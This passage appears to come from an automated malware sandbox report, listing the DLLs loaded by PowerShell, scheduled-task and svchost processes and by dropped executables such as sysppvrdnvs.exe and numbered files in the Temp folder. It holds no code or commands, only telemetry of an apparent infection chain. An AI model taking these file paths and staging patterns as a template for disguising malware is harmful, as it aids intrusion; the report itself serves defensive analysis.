Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: apphelp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: urlmon.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wininet.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: iertutil.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: srvcli.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: netutils.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wldp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: propsys.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: profapi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: edputil.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wintypes.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: appresolver.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: slc.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: userenv.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: sppc.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: winhttp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: mswsock.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: winnsi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: napinsp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wshbth.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: winrnr.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: firewallapi.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: fwbase.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: urlmon.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wininet.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: iertutil.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: srvcli.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: netutils.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: urlmon.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: wininet.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: iertutil.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: srvcli.dll
Source: C:\Users\user\sysppvrdnvs.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
